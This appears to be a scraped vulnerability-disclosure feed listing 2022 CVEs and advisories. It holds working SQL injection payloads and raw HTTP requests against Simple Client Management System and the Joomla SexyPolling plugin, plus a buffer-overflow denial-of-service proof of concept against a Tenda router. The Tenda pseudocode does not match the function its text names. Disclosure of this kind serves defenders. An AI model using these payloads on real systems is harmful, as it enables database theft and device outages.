Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/admin/maintenance/manage_service.php?id=.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Management-System v1.0 by oretnom23 has SQL injection**

**Author：** k0xx

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/admin/maintenance/manage\_service.php?id=

Vulnerability location: /cms/admin/maintenance/manage\_service.php?id=,id

\[+\] Payload: /cms/admin/maintenance/manage\_service.php?id=1%27%20and%20length(database())%20=6%20--+ // Leak place ---> id

Current database name: cms\_db,length is 6

GET /cms/admin/maintenance/manage\_service.php?id\=1%27%20and%20length(database())%20\=6%20\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3m0l1n81dvmlo0a3h9oo72q1gp
Connection: close
// Leak place ---> id

When length (database ()) = 6, Content-Length: 2397 

When length (database ()) = 7, Content-Length: 2355

CVE-2022-29982: bug_report/SQLi-9.md at main · k0xx11/bug_report

Simple Client Management System 1.0 is vulnerable to SQL Injection via \cms\admin?page=client/manage_client&id=.

Permalink

Cannot retrieve contributors at this time

**Simple-Client-Mnagement-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: \\cms\\admin?page=client/manage\_client&id=

Vulnerability location: /cms/admin/?page=client/manage\_client&id=, id

\[+\] Payload: ip/cms/admin/?page=client/manage\_client&id=2' union select 1,user(),3,4,5,6,7 --+

 GET /cms/admin/?page\=client/manage\_client&id\=2%27%20union%20select%201,user(),3,4,5,6,7%20\--\+ HTTP/1.1 // Leak place ---> id
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3m0l1n81dvmlo0a3h9oo72q1gp
Connection: close

CVE-2022-29748: bug_report/SQLi-1.md at main · k0xx11/bug_report

Simple Client Management System 1.0 is vulnerable to SQL Injection via /cms/admin/?page=invoice/manage_invoice&id= // Leak place ---> id.

**Simple-Client-Mnagement-System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html

Vulnerability File: /cms/admin/?page=invoice/manage\_invoice&id= // Leak place ---> id

Vulnerability location: /cms/admin/?page=invoice/manage\_invoice&id=, id

\[+\] Payload: /cms/admin/?page=invoice/manage\_invoice&id=2%27%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12--+ // Leak place ---> id

GET /cms/admin/?page\=invoice/manage\_invoice&id\=2%27%20union%20select%201,user(),3,4,5,6,7,8,9,10,11,12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3m0l1n81dvmlo0a3h9oo72q1gp
Connection: close
// Leak place ---> id

CVE-2022-29747: bug_report/SQLi-2.md at main · k0xx11/bug_report

Foxit PDF Reader and PDF Editor before 11.2.2 have a Type Confusion issue that causes a crash because of Unsigned32 mishandling during JavaScript execution.

CVE-2022-30557: Security Bulletins | Foxit Software

Tenda AX1803 v1.0.0.1_2890 is vulnerable to Buffer Overflow. The vulnerability lies in rootfs_ In / goform / setsystimecfg of / bin / tdhttpd in ubif file system, attackers can access http://ip/goform/SetSysTimeCfg, and by setting the ntpserve parameter, the stack buffer overflow can be caused to achieve the effect of router denial of service.

**Tenda AX1803 v1.0.0.1\_2890 Denial-of-service Vulnerability****Overview**

*   Manufacturer's website infomation: https://www.tenda.com.cn/profile/contact.html
*   Firmware download address: https://www.tenda.com.cn/download/default.html

**Vulnerability description**

The vulnerability lies in rootfs\_ In / goform / setsystimecfg of / bin / tdhttpd in ubif file system, attackers can access http://ip/goform/SetSysTimeCfg And by setting the ntpserve parameter, the stack buffer overflow can be caused to achieve the effect of router denial of service.

**Vulnerability details**

**First unpack the firmware:**

Download the firmware from the manufacturer's official website（ https://www.tenda.com.cn/download/detail-3225.html ）Since the firmware is not encrypted, the Tenda ax1803 v1.0 is encrypted directly through the binwalk tool (command: binwalk - me \*. Bin) 0.0.1\_ Unpack the 2890 firmware to get rootfs\_ UBIFS file system.

**Vulnerability analysis:**

(Note: the following code screenshot is the pseudo-C language code obtained by disassembling and decompiling the / bin / tdhttpd file in rootfs\_ubifs through ida7.6\_pro\_32-bit)

When accessing / goform / setsystimecfg, the user will enter the fromsetsystime function for processing. The following are some pseudo code screenshots and comments of the fromsetsystime function:

When users access http://ip/goform/SetSysTimeCfg Time rootfs\_ ubifs / bin / tdhttpd in will call fromsetsystime to handle this access, and will assign the ntpserver parameter submitted by the post method to the V4 pointer, and then enter an inevitable if branch (analysis has been written in the comments in the pseudo code screenshot). There is a vulnerability code in this if branch: strcpy (& V32 \[16\], B4). Therefore, you can override the return address of the function as invalid address by setting the ntpserver parameter submitted by V4, that is, post to overflow the boundary of V32, so as to restart the router and cause the effect of denial of service attack

Pseudo code of fromsetsystime function attached:

    int __fastcall fromSetIpMacBind(int a1)
    {
    const char *Parameter; // r5
    unsigned int v2; // r0
    int i; // r4
    char *v4; // r0
    char *v5; // r11
    int v6; // r3
    int v7; // r5
    int v8; // r2
    int v10; // [sp+8h] [bp-440h]
    char *nptr; // [sp+10h] [bp-438h]
    int v13; // [sp+14h] [bp-434h]
    char v14[32]; // [sp+28h] [bp-420h] BYREF
    char v15[32]; // [sp+48h] [bp-400h] BYREF
    char v16[64]; // [sp+68h] [bp-3E0h] BYREF
    char v17[64]; // [sp+A8h] [bp-3A0h] BYREF
    char dest[64]; // [sp+E8h] [bp-360h] BYREF
    char v19[128]; // [sp+128h] [bp-320h] BYREF
    char v20[128]; // [sp+1A8h] [bp-2A0h] BYREF 可以通过设置list参数通过strcpy函数溢出的
    栈上变量
    char s[256]; // [sp+228h] [bp-220h] BYREF
    char v22[288]; // [sp+328h] [bp-120h] BYREF
    memset(s, 0, sizeof(s));
    memset(v16, 0, sizeof(v16));
    memset(v19, 0, sizeof(v19));
    nptr = GetParameter(a1, "bindnum", "0");
    Parameter = GetParameter(a1, "list", &byte_1E9CC8);// 将访问
    ip/goform/SetIpMacBind时post提交的list参数
    // 赋值给Parameter变量
    GetValue("dhcps.Staticnum", v19);
    v13 = atoi(v19);
    v2 = atoi(nptr);
    v10 = v2;
    if ( v2 > 0x20 )
    {
    printf("staic ip number over %d\n", 32);
    goto LABEL_30;
    }
    for ( i = 1; ; ++i )
    {
    v6 = Parameter;
    if ( Parameter )
    v6 = 1;
    if ( i > v10 )
    v6 = 0;
    if ( !v6 )
    break;
    memset(v20, 0, sizeof(v20));
    memset(v17, 0, sizeof(v17));
    memset(v22, 0, 0x80u);
    memset(v14, 0, sizeof(v14));
    memset(v15, 0, sizeof(v15));
    memset(dest, 0, sizeof(dest));
    v4 = strchr(Parameter, '\n'); // 如果parameter也就是post提交的
    list参数中存在换行符，则v4不为零，否则v4为零。
    v5 = v4;
    if ( v4 ) // v4不为零，也就是提交的list参数中存
    在换行符
    {
    *v4 = 0;
    strcpy(v20, Parameter); // 该处strcpy未检验v20边界，故可以通
    过Parameter参数来溢出v20的边界以覆盖该函数的返回值，造成设备重启并且达到拒绝服务攻击。
    Parameter = v5 + 1;
    }
    else // v4为零，也就是提交的list参数中无换
    行符
    {
    strcpy(v20, Parameter); // 该处strcpy未检验v20边界，故可以通
    过Parameter参数来溢出v20的边界以覆盖该函数的返回值，造成设备重启并且达到拒绝服务攻击。
    }
    if ( v20[0] == 13 )
    {
    if ( _isoc99_sscanf(&v20[1], "%17[0-9a-fA-F:]\r%s", v14) != 2 )
    goto LABEL_20;
    strcpy(dest, &byte_1E9CC8);
    }
    else if ( _isoc99_sscanf(v20, "%[^\r]\r%[0-9a-fA-F:]\r%s", dest) != 3 )
    {
    LABEL_20:
    v2 = puts("get ip and mac error!");
    v6 = 1;
    break;
    }
    printf("%s %d# dev_name=%s,mac_addr=%s,ip_addr=%s\n", "set_mac_bind_list",
    543, dest, v14, v15);
    sprintf(v17, "dhcps.Staticip%d", i);
    sprintf(v22, "%s;%s;0", v15, v14);
    v2 = SetValue(v17, v22);
    if ( dest[0] )
    {
    memset(v17, 0, sizeof(v17));
    memset(v22, 0, 0x80u);
    v2 = sub_62C98(dest, v14);
    }
    }
    v7 = v10 + 1;
    if ( i == v10 + 1 )
    {
    if ( !v6 )
    {
    puts("set static num sucess!");
    v2 = SetValue("dhcps.Staticnum", nptr);
    while ( v7 <= v13 )
    {
    memset(v19, 0, sizeof(v19));
    sprintf(v16, "dhcps.Staticip%d", v7);
    GetValue(v16, v19);
    sprintf(v16, "dhcps.Staticip%d", v7++);
    v2 = SetValue(v16, &byte_1E9CC8);
    }
    goto LABEL_27;
    }
    LABEL_30:
    v8 = 1;
    goto LABEL_31;
    }
    if ( v6 )
    goto LABEL_30;
    LABEL_27:
    if ( sub_8CB38(v2) )
    {
    memset(v22, 0, 0x100u);
    strcpy(v22, "op=200");
    send_msg_to_netctrl(19, v22);
    }
    v8 = 0;
    LABEL_31:
    sprintf(s, "{\"errCode\":%d}", v8);
    return sub_55970(a1, s);
    }
    

**POC**

    POST /goform/SetSysTimeCfg HTTP/1.1
    Host: 192.168.10.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: password=bb507bf3973a97a9bf1267699f712550bkcmji
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    ntpServer=a*num
    

(Note: num needs to be greater than 0x134h bytes, that is, if the number of characters to be sent is greater than 0x134h, DoS attack can be caused)

CVE-2022-30040: GitHub - Le1a/CVE-2022-30040

Ubuntu Security Notice 5411-1 - Multiple security issues were discovered in Firefox. If a user were tricked into opening a specially crafted website, an attacker could potentially exploit these to cause a denial of service, spoof the browser UI, bypass permission prompts, obtain sensitive information, bypass security restrictions, or execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-5411-1May 11, 2022firefox vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 21.10- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Firefox could be made to crash or run programs as your login if itopened a malicious website.Software Description:- firefox: Mozilla Open Source web browserDetails:Multiple security issues were discovered in Firefox. If a user weretricked into opening a specially crafted website, an attacker couldpotentially exploit these to cause a denial of service, spoof thebrowser UI, bypass permission prompts, obtain sensitive information,bypass security restrictions, or execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 21.10:  firefox                         100.0+build2-0ubuntu0.21.10.1Ubuntu 20.04 LTS:  firefox                         100.0+build2-0ubuntu0.20.04.1Ubuntu 18.04 LTS:  firefox                         100.0+build2-0ubuntu0.18.04.1After a standard system update you need to restart Firefox to makeall the necessary changes.References:  https://ubuntu.com/security/notices/USN-5411-1  CVE-2022-29909, CVE-2022-29911, CVE-2022-29912, CVE-2022-29914,  CVE-2022-29915, CVE-2022-29916, CVE-2022-29917, CVE-2022-29918Package Information:  https://launchpad.net/ubuntu/+source/firefox/100.0+build2-0ubuntu0.21.10.1  https://launchpad.net/ubuntu/+source/firefox/100.0+build2-0ubuntu0.20.04.1  https://launchpad.net/ubuntu/+source/firefox/100.0+build2-0ubuntu0.18.04.1

Ubuntu Security Notice USN-5411-1

Joomla SexyPolling version 2.1.7 suffers from a remote SQL injection vulnerability.

# Exploit Title: Joomla Plugin SexyPolling 2.1.7 - SQLi  
# Google Dork: intext:"Powered by Sexy Polling"  
# Date: 2022-02-08  
# Exploit Author: Wolfgang Hotwagner  
# Vendor Homepage: https://2glux.com/projects/sexypolling  
# Software Link: https://2glux.com/downloads/files/free/sexypolling_pack_2.1.7_2glux.com.zip  
# Version: all versions below version 2.1.8  
# Tested on: Debian Bullseye

SexyPolling SQL Injection

====================

| Identifier: | AIT-SA-20220208-01|  
| Target: | Sexy Polling ( Joomla Extension) |  
| Vendor: | 2glux |  
| Version: | all versions below version 2.1.8 |  
| CVE: | Not yet |  
| Accessibility: | Remote |  
| Severity: | Critical |  
| Author: | Wolfgang Hotwagner (AIT Austrian Institute of Technology) |

Summary

========

[Sexy Polling is a Joomla Extension for votes.](https://2glux.com/projects/sexypolling). In all versions below 2.1.8 an unauthenticated attacker could execute arbitrary SQL commands by sending crafted POST-parameters to poll.php.

Vulnerability Description

====================

In the vote.php file, the POST parameters min_date and max_date are insufficiently checked and sanitized. An attacker can use these parameters to send payloads for sql injections.

In lines 74 and 75 in the *site/vote.php* code, the parameters are assigned without being checked:

```  
$min_date_sent = isset($_POST['min_date']) ? $_POST['min_date'].' 00:00:00' : '';  
$max_date_sent = isset($_POST['max_date']) ? $_POST['max_date'].' 23:59:59' : '';  
```

These are later used unfiltered by the WHERE clause:

```  
$query_toal = "SELECT  
COUNT(sv.`id_answer`) total_count,  
MAX(sv.`date`) max_date,  
MIN(sv.`date`) min_date  
FROM  
`#__sexy_votes` sv  
JOIN  
`#__sexy_answers` sa ON sa.id_poll = '$polling_id'  
AND  
sa.published = '1'  
WHERE  
sv.`id_answer` = sa.id";

//if dates are sent, add them to query  
if ($min_date_sended != '' && $max_date_sended != '')  
$query_toal .= " AND sv.`date` >= '$min_date_sended' AND sv.`date` <= '$max_date_sended' ";  
```

Proof Of Concept

==============

To check a system for vulnerability, modify the POST request so that the min_date parameter contains a single apostrophe.

HTTP-Request:  
```  
POST /components/com_sexypolling/vote.php HTTP/1.1

Host: joomla-server.local  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
HTTP_X_REAL_IP: 1.1.1.1  
Content-Length: 193  
Origin: joomla-server.local  
Connection: close  
Referer: joomla-server.local/index.php/component/search/  
Cookie: 3f7d6b4d84916c70a46aaf5501d04983=iuddgl57g75v5gruopdqh0cgd6

polling_id=1&answer_id[]=3&dateformat=digits&min_date=2021-12-07'&max_date=2021-12-14&country_name=-&country_code=-&city_name=-&region_name=-&voting_period=24&ae9a061e2170d406fb817b9ec0c42918=1  
```

The HTTP-Resoonse contains a mysql error:

```  
HTTP/1.1 500 Internal Server Error  
Date: Wed, 15 Dec 2021 10:27:40 GMT  
Server: Apache/2.4.41 (Ubuntu)  
Set-Cookie: PHPSESSID=39p4ql2oj0b45opsf6p105tfcf; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-cache  
Pragma: no-cache  
Set-Cookie: sexy_poll_1=1639564060; expires=Thu, 16-Dec-2021 10:27:40 GMT; Max-Age=86400; path=/  
Content-Length: 4768  
Connection: close  
Content-Type: application/json

<!DOCTYPE html>  
<html lang="en-gb" dir="ltr">  
<head>  
<meta charset="utf-8" />  
<title>Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '00:00:00' AND sv.`date` <= '2021-12-14 23:59:59'' at line 12</title>  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />  
```

Vulnerable Versions  
================  
All versions below version 2.1.8

Tested Versions  
=============  
Sexy Polling ( Joomla Extension) 2.1.7

Impact  
======  
An unauthenticated attacker could inject and execute SQL commands on the database.

Mitigation  
=========  
Sexy Polling 2.1.8 fixed that issue

Vendor Contact Timeline  
====================  
| 2021-12-14 | Unable to find a contact of the vendor |  
| 2021-12-15 | Contacting Joomla Security Strike Team |  
| 2021-12-29 | Answer from the Joomla Security Strike Team that they will investigate the problem. |  
| 2022-01-01 | Sexy Polling releases 2.1.8 |  
| 2022-04-08 | Public Disclosure |

*We would like to note that the communication about this issue was weak. The contact-form of the maintainer of sexy_polling was broken and there was no other contact published. The Joomla Security Strike Team let us know that they will investigate, but they did not send any updates about the progress.*

Advisory URL  
===========  
[https://www.ait.ac.at/ait-sa-20220208-01-sexypolling](https://www.ait.ac.at/ait-sa-20220208-01-sexypolling)

Joomla SexyPolling 2.1.7 SQL Injection

Check Point ZoneAlarm before version 15.8.200.19118 allows a local actor to escalate privileges during the upgrade process. In addition, weak permissions in the ProgramData\CheckPoint\ZoneAlarm\Data\Updates directory allow a local attacker the ability to execute an arbitrary file write, leading to execution of code as local system, in ZoneAlarm versions before v15.8.211.192119

Tag

#firefox